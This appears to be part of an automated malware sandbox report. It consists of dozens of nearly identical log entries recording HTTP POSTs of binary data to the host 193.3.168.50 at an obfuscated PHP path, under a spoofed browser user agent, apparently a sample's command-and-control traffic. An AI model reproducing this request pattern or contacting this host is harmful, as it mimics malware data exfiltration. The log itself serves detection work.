                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1924Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1908Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
